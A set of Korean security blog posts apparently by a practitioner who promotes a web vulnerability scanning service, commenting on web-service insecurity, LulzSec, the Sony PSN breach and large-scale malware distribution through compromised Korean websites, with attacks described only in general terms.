“ 일반적으로 웹 서비스의 개발기간은 그리 길지 않다. 정형화된 형태에 이미지 작업들이 다수 추가 되기 때문이며 아주 특화된 서비스가 아닌 경우에는 항상 일정 기한 내에 끝나게 마련이다. 대부분의 웹 서비스 개발의 문제는 제한된 기한내에 개발을 하되 보안성, 가시성, 편의성을 만족 시켜야 된다고 한다. 기한이 촉박한 경우에는 눈에 보이는 것만을 가지고 평가 할 수 밖에 없다. 즉 눈에 보이지 않는 보안성은 항상 뒷전에 물러날 수 밖에 없고 보이는 것만으로 평가를 할 수 밖에 없으며 개발 업체에서도 가시성과 편의성에 중점을 둔 개발을 할 수 밖에 없다.

잦은 변경이 있는 웹 서비스에서 일반적으로 보안진단을 하기 위해서는 웹 개발자보다 비용이 높은 보안전문가들을 투입하여 개발하는 기간 이상의 정밀 진단과 문제점 파악이 필요한 현 상황에서 비용대비 효과를 맞추기란 쉽지 않다.

잦은 변경과 점검에 걸리는 기간의 문제는 현재 웹 서비스의 보안성을 단순한 도구에 의존하게 하고 있으며 이 도구들은 우회 공격에 취약함을 보이고 있다. 근본 원인 제거 없이는 계속 될 수 밖에 없는 문제라는 것이다.”

셋째는 이해의 문제

“ 한 서비스에 대해서 진단이 되었을 때 그 서비스의 기술적인 보안 문제들을 장문의 결과 보고서에 기록하여 보내준들 그 문제를 이해 할 수준의 개발자들은 거의 없다. 사전식으로 정의 되는 모든 보안 문제들에 대해 일반적인 이야기를 할 때 개발자들은 어느 것을 먼저 해야 하는지? 또 이걸 했을 때 서비스에는 지장이 없는지를 확인 하기가 어렵다. 전문가들 조차도 제대로 이해하기 어려운 보고서의 내용들을 분야가 다른 비전문가들이 읽고 이해 하며 적용을 할 것이라는 것은 상당한 거리감이 있는 이야기 라고 보아야 된다.

문제의 포인트는 가장 시급하면서도 공격자들에게 가장 많이 이용되는 문제들을 지적하고 고칠 수 있는 방안을 실시간으로 제시 할 수 있는가 이다.  보고서와 가이드를 보고 자신의 코드에 적용 시킬 수 있는 사람들은 많지 않다. 그러나 어떤 개발 습관이 또 어떤 코딩이 문제가 있는지를 문제 부분을 지정하여 확인을 시켜 주고 또 재 검증을 할 수 있다면 문제가 달라 질 수 있다.

현재까지의 웹서비스에 대한 보안 방법들의 문제들은 모두 동일한 문제점을 가지고 있다. 사용자 친화적이지 못하며 근본 원인 해결을 위해 부족한 점 ( 비용, 기간, 인력)들이 많을 수 밖에 없다.”

비용과 기간, 이해의 문제를 해결 하기 위해서 필요한 것이 SaaS 서비스이며 보안서비스를 위탁받아 관리를 해주는 것과는 다른 부분이다.  전 세계적으로 가장 필요한 부분이며 가장 대중화된 서비스인 웹서비스 자체를 안전하게 만들기 위해서는 빠르고 직시적이며 바로 반영 할 수 있는 서비스가 절대적으로 필요 할 수 밖에 없다.  국내만의 문제가 아닌 전 세계적인 문제이다.


서비스로서의 보안은 문제 해결을 할 수 있어야 SaaS라 불려져야 한다.


실시간으로 URL을 입력하고 웹서비스의 문제점을 확인 한 후 문제점을 해결 하는 방안을 직시적으로 적용한다. 이후 제대로 적용이 되었는지를 다시 한번 확인을 하게 되면 된다. 숙련된 개발자에게는 이 모든 문제를 해결 하는 시간이 빠르면 30분 늦어도 하루 이내에 완료가 되어야 한다. 그래야 현재의 위기에 처한 인터넷 서비스 상황을 반전 시킬 수가 있다.


SaaS란 지금까지의 패러다임을 바꾸어야만 가능한 모델일 수 밖에 없다.

아무도 모를 취약성이란 없다. 더군다나 공개적으로 오픈 될 수 밖에 없는 웹서비스에 대한 취약성은 데이터베이스까지도 직접 위험에 노출 시킴으로 더 심각한 상황에 처하게 되는 것이다.  이 문제의 해결은 접근성의 확대 , 저렴한 비용, 필요 부분에 대한 직접 가이드 제공이 되어야 가능 할 것이고 이때에야 우리는 문제 해결을 시작 할 수 있게 될 것이다.

전문가라면 스스로가 알고 있는 지식과 경험을 가장 낮은 수준에서 널리 이해 할 수 있도록 만드는 사람이 진짜 전문가라 할 수 있다. 보안전문가라면 알고 있는 기술과 경험을 대중에게 제공 할 수 있는 매커니즘을 고민해야 다음 단계로 갈 수 있다고 생각 한다.

이제 공격자들의 적극적 공세에 맞설 수 있는 가이드가 필요한 시대가 되었다.

세계에서 처음 시도되는 과정까지 보여주는 실시간 점검 서비스

국내의 90% 이상의 웹서비스들은 10분 이내에 점검이 완료 되도록 한 속도

가장 많은 공격도구들이 이용하는 웹 애플리케이션 취약성에 대한 집중진단

더불어 구글도 탐지하기 어려운 유포지 탐지는 덤으로 제공한다.

널리 세상을 이롭게 만들자는 가치 아래 시작되는 프로젝트

https://scan.bitscan.co.kr

https://scan.bitscan.co.kr
빛스캔- 세상을 바꿀 플랜
Posted by 바다란

FB에 올린 450자 짜리 단상을 묶어서 게재 합니다.
별도 컬럼으로 정리가 필요한 것들도 있지만 fb에만 자주 쓰다보니 블로그에는 자주 못 쓰는 경향이 있네요. 또한 450자로도 표현하기 힘든 많은 내용과 생각들이 있어서 아쉬움에 여기에 옮깁니다.
페북 주소


Recruiting and developing the 21st century cyber warrior

http://www.scmagazineus.com/recruiting-and-developing-the-21st-century-cyber-warrior/article/210230/


이 글은 미국방 분야에서 사이버 보안 인력을 뽑을때 문제가 되는 부분들과 비교가 되는 부분들에 대해서 잘 정리가 된 컬럼 이다. 정확하게 문제가 되는 부분들에 대해서 지적하고 있고 이 내용은 국내도 동일하다.

글을 읽어야 할 사람들은 도구로서 이용만 하려 하거나, 숫자만 채우면 된다고 생각 하거나, 시키면 할 것이다라는 모든 사람들에게 해당 된다. 일반 회사도 마찬가지 상황일 것이다. 
컬럼 자체는 정책결정 가능한 고위직, 군간부, 기업의 경영진이 꼭 봐야 할 내용이다. 물론 보안을 생각한다면..

결론적으로 가장 중요한 한마디만 요약하면 사이버 보안을 담당하는 인력들을 유인하기 위해 가장 중요한 하나는 동기부여 및 새로운 것에 대한 지적호기심 자극이 가능 중요하다고 할 수 있다. 별도 정리 예정


* 인력을 뽑는 다는 측면에서 고려해야 할 점이 많음을 볼 수 있다. 급여 및 다른 제반조건이 아무리 좋다고 하여도 다른 방향을 보는 사람을 포용하여 공동의 이익을 얻기 위해서는 서로가 같이 맞추어야 할 부분이 많다는 것이다. 가장 중요한 포인트는 두가지. 동기부여 측면과 공격을 강화 하는 것은 보호를 강화하는 것과는 다른 측면이라는 인식이 절대적으로 필요하다는 점이다. 

보안분야를 강화하기 위해 인력 양성이나 인력 확보를 노력 하는 모든 기업이나 기관, 국가에서 귀담아 들어야 할 내용이라 생각 된다.


구글을 이용한 정보 유출에 관련된 내용. 특별할 것은 없다. 여기에서 언급된 FTP 검색과 같은 경우 민감한 데이터들이 보호되지 않은 상태에서 나타날 경우 언제든지 외부에 의해 검색 될 수 있다는 점이고 . 예일대의 개인정보 유출 사건과 같이 FTP에 올려진 데이터가 검색에 의해 드러나는 경우를 예로 들고 있다. 


구글을 이용한 공격정보 획득은 이미 오래전 부터 이루어 지고 있고 지금도 활발하게 이루어 지고 있다. 고급검색을 통해 특정 URL과 인자를 조회하고 그 부분에 대해서 공격하는 기법, 파일 검색을 통한 정보 유출들은 일상적으로 있어온 일이다. 고급검색을 통한 URL 검출과 인자 검출 부분을 대응하기 위해서는 전체를 검사해야 하는 문제가 있고 이 문제는 앞으로도 오랜기간 지속 될 것이다. .

* 이 구글 해킹은 상당히 오래된 내용이며 단일 도메인에 대해서 공격을 하는 것은 이미 2005년에 출현을 하였다. 이 이전에 있던 것은 구글 도메인이 아닌 다른  유형의 php worm 이나 악성코드들이 있었으나 구글이 검색에서 주도권을 쥔 이후에는 이제 모두 이걸 이용한다. 그렇다고 구글에서 차단을 해 보았자 일정기간내의 횟수를 초과할 경우에만 제한이 걸리는데 이걸 공격자들은 가볍게 우회한다. 프락시 이용으로...

2005년에 출현한 것인 단일 도메인에 대한 공격 이였다면 2008년 무렵부터 지금까지 출현하는 대부분의 공격도구들은 전체를 대상으로 하고 있다. 불특정 도메인 ( 검색 조건에 맞는 모든 도메인이 해당된다. 특정 확장자에 특정 인자 사용 ..) 을 대상으로 공격과 악성코드 유포 시도를 반복하고 있다.

분명한 것은 지금의 공격 양상은 이 글을 읽는 분들이 생각하시는 것보다 휠씬 더 대규모이고 정교하다는 점이다. 이래서 대응이 어려운 것이기도 하고...

< 공격도구의 한 예이다. >

Epson, HSBC Korea, domain registrar hacked: 100,000 domains affected

http://www.zdnet.com/blog/btl/epson-hsbc-korea-domain-registrar-hacked-100000-domains-affected/55864
 

잭 휘태커에 의해 리스트된 가비아 해킹 사고. 해외에서 이런 기고를 보는 친구들은 어떻게 볼까?. 레지스타가 해킹 되어 주요 도메인을 포함한 10만개 이상의 도메인이 해킹 당한것으로 보이는 현실에서 단순한 문제라고 치부할 것인가? 근원적인 문제를 고민 해야 한다. 1.25때에도 DNS 가 문제가 되어 전체 서비스 연결이 안되었듯이 ( 서비스는 다 살아 있었다. 주소 매핑만 안되었을 뿐이지.) 앞으로도 동일한 현상은 심각한 문제라고 봐야 된다.


덧붙여 SK 컴즈의 해킹 사고에 대해서도 언급을 하고 있다. 해외에서 국내의 이슈에 대해 직접 언급 하는 것으로 볼때 이제 세상에 비밀이란 없고 우리끼리만 아는 것도 없는 것 같다. 


공격과 수비의 조합은 절묘해야 팀이 이루어 진다. 공격보다 수비가 어려운 것은 지금의 축구에서도 당연한 일이다.


* 이 부분에 대해서는 별도 언급을 할 필요조차 없다. 공격을 하는 것은 한 지점과 한 부분을 노려서 목적을 달성 할 수 있지만 수비를 한다는 것은 성을 수비하는 것과 같다. 항상 꾸준하고 전술의 변화를 볼 수 있어야 하고 공격 전술의 변화에 따라 능동적으로 대응을 해야 한다.

말이 쉽지.. 전체의 수준을 일정 수준이상 올린 이후에 변화를 따라가고 수성을 한다는 것은 최소한 공격보다 열배 이상.. 아니 그 이상의 노력과 진지함이 필요하다는 것이다.
공격진의 헛발질은 애교이지만 수비진의 헛발질은 자멸이다. 그렇다고 모두가 다 공격일변도로 나갈 것인가? 정말 어려운 것은 공격이 아닌 막는다는 게 더 어렵다는 것을 인식 해야 한다.  우리에게 정말 필요한 것은 이런 막을 수 있는 전략가의 부재와 인력풀의 협소함, 경영층의 인식 부족이 가장 큰 걸림돌이 될 것이다.

 

Android-becoming-windows-of-mobile-hacking-world
 

http://www.itpro.co.uk/635725/android-becoming-windows-of-mobile-hacking-world 

 

안드로이드를 Windows에 비교한 기사. 정확하게는 현재의 윈도우 시스템이 아닌 2000년 초반기의 윈도우쯤 될 것이다. 시스템 서비스의 문제로 인한 웜의 범람이 극대화 되었던 그 당시의 윈도우 시스템쯤 될 것이다. 안드로이드가 확대 되면 될수록 공격은 더 진지해 질 것이고 대응은 더 어려워 질 것이다. 대응을 위해서는 기존에 실험하지 못한 새로운 방안들이 도입이 되어야 할 것이다. 패턴 매칭은 이제 규모에 밀려 한계를 가지게 될 것이고 사전 대응이 아닌 사후 처리 용으로 사용하게 될 것이다.


지금의 백신들이 사전대응이라고 생각 하면 오산이다. 이미 확산되고 정체가 확인된 것들을 제거 하는 사후 처리용. 악성코드의 생존기간이 짧고 확산은 빠르고 대규모인 특징이 전세계 AV 업계 전체를 패전처리용으로 몰고 있다. 갈길은 아직 멀었다.

 


* 사용자가 몰리고 제한이 허술하면 당연히 공격은 증가하게 마련이다. 애플도 안심 할 수 있을까? 그나마 애플은 전수검사라도 하지 안드로이드는 안습니다.  전수검사를 해도 한계가 있고 심각한 문제들이 발생 하는데 그렇지 않은 곳은 계속 문제가 발생 된다. 

안드로이드도 마찬가지 상황이 되겠지만 현재의 인터넷 상황은 공격자들의 일방적인 학살과 다름이 없다. 보호를 받고 노력을 기울이는 곳들은 방문자들의 환경 (즉 PC)이 초토화 되어 서비스적인 위험에 노출되어 있고 그렇지 않은 노력을 기울이지 않는 곳들은 그냥 열려 있는 상태이다.  그렇다면 일반 사용자의 환경은 언급하기 어려울 정도로 피폐해진 상황이라 볼 수 있다.

누가 백신을 사전대응이라 하는가? 지금의 양상은 단상에 언급했듯이 전세계 AV 업체 모두가 패전처리용에 몰린 상태라고 봐야 된다. 공격자들의 도구의 활용과 전술의 변화는 AV 뿐 아니라 대부분의 보안업체를 규모에서 압도하고 관찰까지 하는 여유를 보이고 있다. 관찰의 의미는 대응여부를 확인하고 바로바로 변화를 준다는 의미이다.

3일만에 대응이 가능한 AV 업체가 있을까? 구글의 stopbadware는? 날마다 바뀌는 코드의 종류를 탐지가 가능할까? .. DNA를 이용한 검증 조차도 무력화 시키는 도구들이 일상적으로 사용 되고 있는데 앞으로 보안업체 모두가 고난의 시간을 걸어야 할 것이다. AV는 물론이고 정통적인 보안업체들도 마찬가지 이리라.

결론은 지금의 짧은 호황을 좋아 하기에는 상황이 심각하다는 점을 알아야 된다는 이야기이다.

- 바다란 세상 가장 낮은 곳의 또 다른 이름



Posted by 바다란

 룰즈섹(Lulz Sec)이 대수인가?” -zdnet

 

미 상원과 CIA, FBI를 해킹하고 PBS 방송국을 공개적으로 해킹하여 전 세계적인 이슈를 불러 왔던 룰즈섹이 50일간의 활동을 접고 해체한다고 한다. 세계적인 관심을 불러 일으켰던 해킹그룹은 여러 측면에서 현재 인터넷의 위험한 상황을 잘 전달 했다고도 볼 수 있다. 그렇다면 세계 여러 언론들이 언급한대로 룰즈섹은 특별한 기술을 가지고 있고 전 세계 어디든 마음대로 공격이 가능한 집단일까? 또 최고의 멤버로 구성이 되어 있어서 세계적인 화제가 되었을까?

 

의문을 가져야 한다.

 

진짜 위급한 상황에 처했을 경우 나타날 수 있는 공격자들도 룰즈섹 정도 일까? 결론적으로 룰즈섹 부류의 공격자들은 지금 이 순간에도 전 세계적인 활동을 하고 있으며 너무나도 일반적이라는 것이다. 진짜는 따로 있다. 이번 컬럼에서는 그 리얼한 모습의 일부분을 제시 하고자 한다.

 

글로벌 하며 대담하고 체계적인 구성을 갖춘 수준높은 조직들과 언제든지 맞설 수 밖에 없는 상황에서 과연 우리는 어떤 준비가 되어 있는가? 상대의 수준도 모른다면 농협과 같은 혼란상황은 불을 보듯 뻔하다. 먼저 컬럼의 제목대로 룰즈섹의 공격기법과 행위에 대해서 살펴보고 진짜 공격자들의 수준을 가늠할 수 있는 일면을 엿보도록 하자.

 

 

룰즈섹 해킹 사례 정리

 

5 7미국 오디션 프로그램 참가자 정보 공개

5 10 - 폭스방송 홈페이지 가입자 정보공개

5 23 - 소니뮤직(일본) 해킹

5 30– PBS 방송국 홈페이지 변조

6 2소니 픽쳐스 정보공개

6 3 FBI 산하의 인프라가드 정보탈취

6 3일본 닌텐도 서비스 공격 및 정보 획득

6 13미국 상원 홈페이지 정보 획득 및 공개

6 15– Tango Down – CIA 홈페이지 접속차단

 

5월부터 6월까지 50일 가까운 활동기간동안 언론에 언급된 주요한 팩트들만 9건 이상이 언급이 되고 있다. 물론 더 많은 사례가 있지만 큰 이슈들만 나열 하였다. 정말 특별한 기술을 가진 그룹이기에 세계적인 관심을 끌었을까?

 

공격과 정보탈취는 이미 인터넷 상에서 일상적으로 일어나는 활동이고 지금도 매우 심각한 상태로 발생 되고 있으며 수없이 많은 서비스들이 권한을 탈취 당한다. 단지 룰즈섹의 경우는 SNS를 이용한 이슈화에 성공 하였을 뿐이며 특별하지는 않다. 9건 가량의 주요 공격을 살펴보면 대부분 웹서비스에 대한 직접 공격 ( SQL Injection이 대부분) DDos ( CIA에 대한 공격) 외에 특별한 기술을 발견하기는 어렵다.  이 두가지 기술 모두 현재 일상적으로 발생 되고 있는 공격에 지나지 않는다. 웹서비스에 대한 취약성을 타이트하게 관리하는 CIA의 경우에는 DDoS 공격 정도로 이슈화를 시켰으며 그외의 공격들은 웹서비스의 코딩은 수시로 변경되고 적용이 되고 있어서 엄격한 관리가 어려운점을 이용하여 웹서비스를 공격하여 권한을 획득하고 데이터베이스의 정보를 획득한 것이라 볼 수 있다.

( SQL Injection을 이용한 공격기법의 변화는 여기를 참고 - http://p4ssion.com/207 )

 

n  난이도 있는 공격?

 

일상적인 수준의 공격이지만 왜 막기가 어려운 것일까? DDoS의 경우는 대량의 좀비 PC를 이용한 트래픽을 발생 시킬 경우 홈페이지 서비스는 차단 될수 밖에 없다. 상징적인 의미이지 실질적인 정보의 유출은 없는 경우라 할 수 있다. 단 에스토니아처럼 모든 것이 IT화된 국가의 경우 행정업무가 마비되는 것은 큰 문제라고 할 수 있을 것이다.

 

그렇다면 SQL Injection은 왜 막기가 어려울까? 이미 문제점에 대해서는 최초 알려진것이 10년도 휠씬 이전이다. 그때와 지금의 다른점은 자동화된 도구가 많아졌고 매우 정교해 졌다는 점뿐일 것이다. 그럼에도 불구하고 막기가 어려운 것은 변화무쌍한 웹페이지 코드의 변화때문이기도 하다. 잦은 개발과 수정이 일상적으로 일어나는 웹서비스의 경우 보안적인 안정상태를 유지한다는 것이 매우 힘들다. 다양한 보안도구들이 있으나 모두 한계를 지니고 있으며 결정적으로 개발기간보다 길게 소요되는 문제 해결기간과 우회가 가능한 패턴매칭의 한계가 있기 때문에 소스코드 보안이든 웹보안 장비를 이용한 차단이든 문제가 될수 밖에 없는 것이다.

 

국내에서 발생된 여러 정보탈취 사건사고들도 별반 다르지 않다. 모두가 정문만을 바라보고 있고 철통같은 경계를 취한다. 그러나 웹서비스가 위치한 지역은 성으로 볼수 있다. 원형의 성에는 외부와 연결되는 여러지점들을 가지고 있으며 이 지점들에는 항상 다른 곳과 연결 될 수 있는 통로가 있다. 즉 어느 곳 한 곳이라도 뚫리게 된다면 내부의 은폐된 정보에 이르는 길은 다 똑같다는 점이다.  모든 웹서비스의 수준을 일정수준이상 유지한다는 것은 매우 어려운 과제가 될수 밖에 없고 공격자들은 이미 전체 노출 범위에 대해 상시적인 공격도구를 보유하고 활발하게 활용하고 있어서 계속적인 위험에 노출되는 것이다.

 

룰즈섹의 경우에도 정보탈취의 경우는 대부분 웹서비스의 인자값들이 완벽하게 필터링 될 수 없다는 점을 이용하여 성공한 사례일 뿐이다. 이미 오래전 부터 겪어왔던 일의 한 부분일뿐이며 지금 이 순간에도 발생되는 사례일 뿐이다. 룰즈섹의 뛰어난점은 허세와 광고에 능했을 뿐.. 진짜 위기의 순간에 맞닥뜨릴 대상들은 지금도 조용히 웃고 있을 뿐이다.

 

n  진짜 우리의 상대는?

 

이제 숨어 있고 잘 알려져 있지 않은 조금 더 수준 높은 자들의 형태를 살펴보자. 공격자들의 역량은 위급상황에 언제든지 태세를 전환하여 큰 피해를 입힐 수 있다는 점을 우리는 농협사태에서 충분히 느낄수 있다. 이면을 살펴 보도록 하자. 먼저 지금까지 공개된바 없는 데이터를 제시한다.

 



< 공격자들이 인위적으로 웹서비스에 추가한 악성코드 다운로드 경로 및 발견일시>

 

올해초 부터 국내 사이트를 통해 대규모로 사용자에게 악성코드를 유포하는데 이용된 경유지들의일부이다. 특히 파일공유 사이트 및 주요 서비스들의 웹서비스 소스를 수정하여 인위적인 외부경로를 추가함으로써 웹서비스 방문자에게 악성코드를 설치하도록 하는데 이용된 주소들이며 최근의 어도비의 플래쉬 플레이어 업데이트가 잦은 이유도 바로 이 주소들로 부터 사용자들에게 설치되는 악성코드들이 거의 제로데이에 해당되는 수준으로 사용자 PC 대부분에 (맥 제외) 설치된 어도비  플래쉬 플레이어를 공격했기 때문이기도 하다.

< 공격 및 감염에 대한 개요도>

최근 공격자들의 공격 방식을 보면 국내의 경우 개별 사이트의 해킹을 통한 정보유출은 사실상 종료 되었다고 봐야 한다. 물론 여전히 발생되고 있고 중요정보를 얻기 위한 수단으로 이용이 되고 있으나 현재는 더 큰 범위로 진화를 했다고 보아야 할 것이다. 개별 사이트가 아닌 동시에 수십여개 이상의 웹서비스에 동일한 악성코드 서버링크를 추가하고 모든 방문자들에게 악성코드 감염을 시도한다. 현재 공격코드의 특성(플래쉬 플레이어 공격)으로 보면 개인 PC에 대한 권한 획득 비율은 50% 이상은 넘을 것으로 예상이 된다. 파일공유 사이트 및 언론사, 커뮤니티 사이트등 수십여개의 주요 사이트들에 대해 공격코드를 가지고 있는 주소를 웹소스에 추가함으로써 자연스럽게 좀비 PC를 확산 시키고 있다.

 

현재까지 공격자들의 목적은 오로지 금전적인 이득이다. 규모와 전략적 차원에서도 비교하기 어려운데 더군다나 국제적이기까지 하다. 악성코드를 뿌리기 위한 수단으로는 국내의 주요 웹서비스를 이용하고 유포하는 주소는 미국의 ISP를 휩쓸다시피한다. 올해 초 부터 관찰되는 데이터에서도 공격자들의 강력함은 여실히 느낄 수 있다. 현재 미국은 정체파악도 못한 상태로 보인다.

 

사용자들에게 악성코드를 뿌리기 위한 수단 : 파일공유, 언론, 커뮤니티외 다수 웹서비스

웹서비스 소스에 추가하는 악성코드 다운로드경로: 해외 ISP 및 국내의 취약한 웹서비스

 

단 하루만에 수십에서 수백여개의 웹서비스를 통해 몇십만대의 PC의 권한을 획득 하고 있는 이들이야 말로 진짜 상대가 아닐까? 해외 ISP를 통채로 이용하는 이들에 비하면 룰즈섹은 피래미가 아닐까? 어쩌면 이것도 빙산의 일각일 수 있다. 우리가 위급한 상황에 처했을때 진정으로 상대해야 할 자들중 일부가 지금은 잠시 돈벌이를 할 뿐이 아닐까? 전 세계는 지금 이들의 정체 조차도 잘 모르고 있는 상황이다. 앞으로 위기의 인터넷은 더 심각한 국면에 직면 할 것이다. 당신이 어디를 방문하든 그들은 지켜보고 있다. 농협사태의 단초가 이들로 부터 시작 했음을 잊지 마라.

 

바다란 세상 가장 낮은 곳의 또 다른 이름

Posted by 바다란


악성코드 경유지의 변화가 매우 극심하다.  2011년 6.25~26일 기준

어제부터 대체 몇번을 바꿔치기 하는지. 분명히 웹서비스는 공격자들의 소유가 맞다.
사업자는 잠시 임대를 했을뿐.

 

어제, 오늘의 변화를 생략하더라도 현재 상황 5종류의 경유지들이 8개 이상의 파일공유 사이트 소스에 추가되어 사용자에게 악성코드를 유포하고 있다. 물론 파일 공유사이트 이외에도 다른 서비스들에도 여러 종류들이 활동하고 있다. 전체적으로 경유지 수치는 이틀 사이에 10곳 이상이 활동중에 있다.

 

특이한 것은 지난번에도 한번 언급했는데.. 시카고와 덴버에 IDC를 가지고 있는 DDos를 전문적으로 대응하는 ISP라고 광고하고 있는 SHARKTECH INTERNET SERVICES 라는 미국 회사의 서비스 대역을 대규모 경유지로 활용하고 있다.


 


 

 

순차적으로 경유지 IP를 변경하면서 사용하고 있는데 .. 지난번 관찰 결과도 보면 호주와 미국의 ISP를 통으로 이용하고 있던데... (이미 해외 ISP의 직접 활용은 3주 이상 관찰이 된바 있다. 대역대를 활용하는 걸로 보아 직접 권한을 가지고 있는 것으로도 볼 수 있다.)


즉 공격자는 전 세계를 무대로 하고 있고 악성코드 유포를 위해 국내 사이트도 직접 해킹을 하고 웹서비스를 변경하며 경유지로 활용하기 위해 해외 주요 ISP 대역을 휩쓸며 악의적인 링크들을 직접 생성하고 올리고 있다. 현재 관찰된 결과는 전 세계적인 활동을 직접하며 이익을 창출 하고 있다는 점이다.  전 세계적인 활동을 하는 공격자들에 대해 국지적인 대응은 효과가 어려울 것이다. 전 세계의 수준을 일정수준이상 올릴 수 있을까?..

앞으로도 불가능해 보인다.
 

이번 샤크테크 ISP의 특징이라고 할 수있는 DDoS 대응 특화를 하면 뭐하누? 정작 내부는 만신창이인데.. 이 나라의 인터넷을 공격하고 이득을 얻는 공격자들은 글로벌 하게 놀고 있다.

http://www.sharktech.net/index.php?ID=aboutus&PG=2

 

앞으로도 매우 어려운 싸움이 될 것이다. 사실은 싸움의 상대도 되지 않지만 ...

Posted by 바다란

zdnet 컬럼입니다.

 한때 소니라고 불리는 영원할 것 같은 제국이 있었다. 워크맨으로 부터 시작한 거대 IT 제국은 각 영역의 거센 도전자를 만나 점차 힘을 잃어 가고 있었고 부활을 꿈꾸기 위해 시작한 PSP ( Play station ) 사업은 일순간의 영화를 재현하는 것 처럼 보였고 재기를 꿈꾸게 만들었다.

전자기기와 엔터테인먼트 산업의 거인이던 소니는 그 각 산업의 결과물을 결집 하였고 거대한 네트워크를 형성 하였다. 무너지지 않는 성처럼 보이던 거인의 보금자리는 단 한번의 손짓에 완전히 무너지는 과정에 접어 들었다.

 

무려 7500만에 달하는 전 세계 사용자의 정보와 신용카드 정보의 유출은 앞으로의 미래를 예측 할 수 없는 어둠으로 밀어 넣었으며 어쩌면 소니의 재기를 꿈꾸던 산업은 앞으로 더 험난하고 어두운 미래속으로 진입을 한 것이다. 단 하나의 뛰어난 해킹 그룹에 의해 무너졌다고 보기는 어렵다. 그 어떤 누군가에 의해서도 당할 수 밖에 없는 취약한 부분이 있었고 그 부분은 이제 거인의 무릎을 꿇게 하고 있다. 일인당 피해 배상 금액의 한도를 100만 달러 (11)으로 책정한 소니의 사건은 경우에 따라 한 거대기업의 몰락을 직접적으로 볼 수 있게 할 것이다.

 

나뭇잎이 붙은 단 하나의 지점이 치명적인 약점으로 작용한 아킬레스의 건처럼 거인의 온 몸은 튼튼하고 강했지만 사소한 작은 부분 하나가 내부의 혈관을 멈추게 한다. 지금의 기술적 보안의 현실과 다르지 않다. 정문만을 철저하게 보호하고 지키는 것은 당연히 공격자들을 우회하게끔 만들고 그 우회의 결과는 모든 노출 부분이 일정 수준 이상을 항상 유지 하지 않으면 언제든 치명적인 결과를 초래함을 목격하고 있다.

 

n  위험의 시작

 

The register에서 언급된 소니의 해명기사를 보면 사건의 전말을 유추 할 수 있다.

 

Sony: 'PSN attacker exploited known vulnerability'

Sonys Shinji Hasejima, Sonys CIO, told Sonys apologetic news conference that the attack was based on a known vulnerability in the non-specified Web application server platform used in the PSN. However, he declined to stipulate what platform/s were used or what vulnerability was exploited, on the basis that disclosure might expose other users to attack.

Hasejima conceded that Sony management had not been aware of the vulnerability that was exploited, and said it is in response to this that the company has established a new executive-level security position, that of chief information security officer, to improve and enhance such aspects.

 

The Register http://www.theregister.co.uk/2011/05/01/psn_service_restoration/

 

<소니의 해명 기자회견 장에서 공개된 침입 개요도 근본은 달라지지 않는다.>

 

PSN과 연결된 네트워크 영역에 위치한 웹서버가 알려진 공격에 의해 권한을 획득 당했음을 알 수 있다. 일반적은 웹서비스들은 데이터베이스 서버와 연동하여 정보를 웹페이지에 표시를 한다. 즉 웹서비스들은 데이터베이스와 연결 할 수 있는 권한을 가지고 있으며 만약 외부에 노출되어 서비스를 하고 있는 웹서비스가 해킹을 당한다면 이것은 데이터베이스의 정보도 반드시 외부로 유출 될 수 밖에 없다는 점을 의미한다. 소니에게 일어난 최악의 정보유출 사고는 그들의 관리영역 아래에 있는 웹서비스들중 어쩌면 중요도가 떨어지는 서비스가 직접적인 공격을 받고 권한을 이용해 데이터베이스의 전체 내용을 유출한 것이라고 보아야 할 것이다.

 

n  시나리오의 재구성

 

PSN ( Play Station Network) 영역에 대한 공격을 기반으로 간략하게 도식화한 침입 과정과 경로는 다음과 같이 예상 할 수 있다.


 

그림상에 나오는 1,2,3의 순서대로 되었을 것이고 동일 데이터베이스에서 연동되는 형태 였다면 2,3은 같이 묶이는 형태가 될 것이다. 외부에 노출된 서비스 영역에 존재하는 모든 웹서비스를 일정 수준이상 유지를 해야 위험성을 예방 할 수 있지만 개편이 진행 중이거나 통합이 진행중인 상황에서 개발보다 시간이 오래 걸릴 수 있는 보안점검은 오히려 장애물이 될 뿐이였을 것이다.

 

보안규정을 준수하고 모든 보안장비를 설치한다고 하여도 문제의 근원을 제거하지 못한다면 소용이 없다.  보안진단을 꾸준히 받고 많은 비용을 들여 컨설팅을 받는다 하여도 상시적인 수정과 개편이 일상화된 웹서비스에서는 안정성을 계속해서 보장 받는다는 것은 현실적으로 불가능하다.

 

거대기업이든 보안적인 역량이 충분한 기업이든 현재 상태에서는 안정성을 보장하기가 어렵다.

모든 외부 노출 부분에 대해 상시적인 진단과 문제점을 확인 할 수 있는 과정은 아직 출현하지 않았기 때문이며 그만큼 공격자들의 우위는 보다 높은 곳에 있다. 지켜야 할 곳은 많고 잠시의 여유와 한가로움은 치명적인 결과로 돌아오기에 지키는 자들도 힘든 과정에 돌입해 있다.

 

n  무엇이 문제인가?

 

간단하게 말해서 소니의 몰락은 아주 작은 부분에서 부터 시작이 되었으며 그 과정에 며칠이 걸리지도 않았다. 위험으로 부터 보호하기 위한 단계별 조치들은 모두 이루어 졌다 하여도 지켜야 할 범위의 광범위함과 끊임없는 변화 ( 웹서비스의 개편)는 수시로 공격자들에게 기회를 준다. 아주 오래전 부터 알려진 공격이 가능한 문제들이지만 지금의 공격자들은 이미 자동화된 공격도구로 모든 범위를 호시탐탐 노리고 있다. 문제의 수정을 위해서 다양한 도구와 전문성 있는 진단 도구를 활용하여도 전체 범위를 수시로 커버하지 못하는한 문제 해결은 요원한 길이다.

 

모든 개발자를 교육 시키는 것도 어려우며 모든 범위를 안전하게 보호하는 것도 어렵다. 대체 무엇을 할 수 있을 것인가? 소니의 공격 사례는 현대캐피탈의 해킹 이슈와 다른점이 하나도 없다. 국내는 해외든 여기에서 안전할 기업이 있을까? 목표가 되면 거기가 끝이 된다.

 

아킬레스의 생존을 위해서는 온 몸의 구석구석을 일정수준 이상 유지 할 수 있는 실효적인 서비스와 이상 부분을 가장 빠르고 단기간에 확인 할 수 있도록 체계를 유지 하지 않으면 내일의 희생자는 바로 자신이 될 수 밖에 없다. 소니의 몰락을 잊지마라.

 

웹서비스 보안과 관련 하여서는 http://p4ssion.com/241 컬럼을 참고하고 필요 부분에 대해서는 2008년에 작성한 Mass sql injection 대응과 현실이라는 컬럼 (http://p4ssion.com/200)의 내용을 참고 하면 무엇이 필요한지에 대해서 인지 할 수 있다.

 

